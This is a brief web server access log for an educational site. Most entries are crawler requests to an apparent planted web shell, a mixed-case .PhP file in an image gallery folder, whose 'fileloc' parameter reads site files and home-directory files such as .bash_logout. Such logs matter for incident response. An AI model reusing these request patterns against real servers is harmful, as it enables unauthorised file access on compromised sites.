216.73.216.53 - - [29/Jun/2025:19:08:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Frobots.txt&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 1623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:08:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fattendance_report.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:08:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fland-document.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 3308 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.167.239 - - [29/Jun/2025:19:09:36 +0530] "GET /16VTqnyEG037fd_ia/admin/images/b-ed.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/16VTqnyEG037fd_ia/admin/images/fee_structure.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [29/Jun/2025:19:10:15 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fb-ed.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:10:15 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2F.bash_logout&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:10:15 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fphoto-gallery.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 3713 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
